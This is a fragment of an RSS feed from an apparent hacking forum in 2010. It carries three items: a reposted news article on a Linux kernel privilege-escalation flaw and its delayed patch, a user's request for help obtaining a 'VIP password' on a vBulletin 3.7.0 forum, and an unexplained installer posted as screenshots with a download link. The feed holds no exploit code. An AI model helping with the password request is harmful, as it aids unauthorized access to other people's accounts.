			<pubDate>Sun, 22 Aug 2010 06:36:57 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1867</guid>
			<description><![CDATA[Questions are being raised in the Linux community about how a bug in the kernel was allowed to exist for seven years after a fix was first mooted.The flaw, found by Rafal Wojtczuk, is a problem in the memory management area of Linux which allows attackers to execute code at root level. It is caused by overlaps between the memory areas of the stack and shared memory segments.Insecurity expert Joanna Rutkowska says that the vulnerability has been present in the kernel for years,since version 2.6, which was released in December 2003.<br />
While in security terms the existence of the flaw fits into the "s*** happens" category, the question remains why the hole was never patched until now. Particularly as SuSE maintainer Andrea Arcangeli provided a fix for the problem in September 2004.Open sauce security depends, not only on users finding holes and patching them, but the great hierarchies that watch over the release of updates actually using them. For some reason someone dropped the ball on this and as yet no one has put their hand up to admit it.SuSE had the fix and SuSE Linux Enterprise 9, 10 and 11 and openSuSE 11.1 through 11.3 do not have the problem.The fix for the flaw is to use a guaranteed minimum of one memory page between the stack and other memory areas.Ironically this has been set up in kernel versions 2.6.32.19, 2.6.34.4 and 2.6.35.2, but without the problem being pointed out and may not even be related. Another update is being prepared for inclusion in 2.6.27.52.It is a moot point how dangerous the problem is. The vulnerability seems to harm older systems rather than the new ones and requires that an X Server is running on the system.If you wanted to take over a Linux box you would have to exploit another hole to inject code and execute it on the system. The attacker would then use the flaw to gain root privileges.However, kernel developer Greg Kroah-Hartman warned that all users must upgrade just to be sure. <br />
Source:- <a href="http://ytechnews.blogspot.com/" target="_blank"><span style="font-size: large;"><span style="color: #FF0000;">Y!TechNews</span></span></a>]]></description>
			<content:encoded><![CDATA[Questions are being raised in the Linux community about how a bug in the kernel was allowed to exist for seven years after a fix was first mooted.The flaw, found by Rafal Wojtczuk, is a problem in the memory management area of Linux which allows attackers to execute code at root level. It is caused by overlaps between the memory areas of the stack and shared memory segments.Insecurity expert Joanna Rutkowska says that the vulnerability has been present in the kernel for years,since version 2.6, which was released in December 2003.<br />
While in security terms the existence of the flaw fits into the "s*** happens" category, the question remains why the hole was never patched until now. Particularly as SuSE maintainer Andrea Arcangeli provided a fix for the problem in September 2004.Open sauce security depends, not only on users finding holes and patching them, but the great hierarchies that watch over the release of updates actually using them. For some reason someone dropped the ball on this and as yet no one has put their hand up to admit it.SuSE had the fix and SuSE Linux Enterprise 9, 10 and 11 and openSuSE 11.1 through 11.3 do not have the problem.The fix for the flaw is to use a guaranteed minimum of one memory page between the stack and other memory areas.Ironically this has been set up in kernel versions 2.6.32.19, 2.6.34.4 and 2.6.35.2, but without the problem being pointed out and may not even be related. Another update is being prepared for inclusion in 2.6.27.52.It is a moot point how dangerous the problem is. The vulnerability seems to harm older systems rather than the new ones and requires that an X Server is running on the system.If you wanted to take over a Linux box you would have to exploit another hole to inject code and execute it on the system. The attacker would then use the flaw to gain root privileges.However, kernel developer Greg Kroah-Hartman warned that all users must upgrade just to be sure. <br />
Source:- <a href="http://ytechnews.blogspot.com/" target="_blank"><span style="font-size: large;"><span style="color: #FF0000;">Y!TechNews</span></span></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Vbulletin 3.7.0]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1859</link>
			<pubDate>Sat, 21 Aug 2010 07:57:37 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1859</guid>
			<description><![CDATA[How can I get a VIP password from a Vbulletin 3.7.0 forum? Help please, I just need to access some information which is open only to VIP members?]]></description>
			<content:encoded><![CDATA[How can I get a VIP password from a Vbulletin 3.7.0 forum? Help please, I just need to access some information which is open only to VIP members?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Ronda Ocx ~ 2011_Instalador]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1858</link>
			<pubDate>Fri, 20 Aug 2010 04:50:22 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1858</guid>
			<description><![CDATA[<img src="http://img541.imageshack.us/img541/254/instalacin1.png" border="0" alt="[Image: instalacin1.png&#93;" /><br />
<br />
<img src="http://img710.imageshack.us/img710/8614/panel2o.png" border="0" alt="[Image: panel2o.png&#93;" /><br />
<br />
<div style="text-align: center;"><a href="http://www.megaupload.com/?d=IXY9BIGQ" target="_blank">Download</a></div>]]></description>
			<content:encoded><![CDATA[<img src="http://img541.imageshack.us/img541/254/instalacin1.png" border="0" alt="[Image: instalacin1.png]" /><br />
<br />
<img src="http://img710.imageshack.us/img710/8614/panel2o.png" border="0" alt="[Image: panel2o.png]" /><br />
<br />
<div style="text-align: center;"><a href="http://www.megaupload.com/?d=IXY9BIGQ" target="_blank">Download</a></div>]]></content:encoded>
		</item>
	</channel>
</rss>